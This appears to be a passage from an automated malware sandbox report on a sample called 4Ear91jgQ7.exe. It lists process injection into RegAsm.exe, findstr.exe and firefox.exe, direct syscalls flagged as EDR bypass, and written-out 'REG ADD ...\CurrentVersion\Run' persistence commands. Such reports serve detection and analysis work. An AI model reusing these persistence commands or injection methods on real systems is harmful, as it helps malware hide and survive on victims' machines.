            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A830 mov eax, dword ptr fs:[00000030h]7_2_02F6A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD483A mov eax, dword ptr fs:[00000030h]7_2_02FD483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD483A mov eax, dword ptr fs:[00000030h]7_2_02FD483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBC810 mov eax, dword ptr fs:[00000030h]7_2_02FBC810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F629F9 mov eax, dword ptr fs:[00000030h]7_2_02F629F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F629F9 mov eax, dword ptr fs:[00000030h]7_2_02F629F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]7_2_02FBE9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]7_2_02F3A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F649D0 mov eax, dword ptr fs:[00000030h]7_2_02F649D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]7_2_02FFA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC69C0 mov eax, dword ptr fs:[00000030h]7_2_02FC69C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB89B3 mov esi, dword ptr fs:[00000030h]7_2_02FB89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB89B3 mov eax, dword ptr fs:[00000030h]7_2_02FB89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB89B3 mov eax, dword ptr fs:[00000030h]7_2_02FB89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A0 mov eax, dword ptr fs:[00000030h]7_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F309AD mov eax, dword ptr fs:[00000030h]7_2_02F309AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F309AD mov eax, dword ptr fs:[00000030h]7_2_02F309AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD4978 mov eax, dword ptr fs:[00000030h]7_2_02FD4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD4978 mov eax, dword ptr fs:[00000030h]7_2_02FD4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBC97C mov eax, dword ptr fs:[00000030h]7_2_02FBC97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F56962 mov eax, dword ptr fs:[00000030h]7_2_02F56962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F56962 mov eax, dword ptr fs:[00000030h]7_2_02F56962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F56962 mov eax, dword ptr fs:[00000030h]7_2_02F56962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F7096E mov eax, dword ptr fs:[00000030h]7_2_02F7096E
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeNtCreateKey: Direct from: 0x76EF2C6C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread register set: target process: 7040
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread APC queued: target process: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CA2008Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 113E008Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B20008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B9E008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C61008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11F6008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A66008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C6B008
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: ADF008
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"Jump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
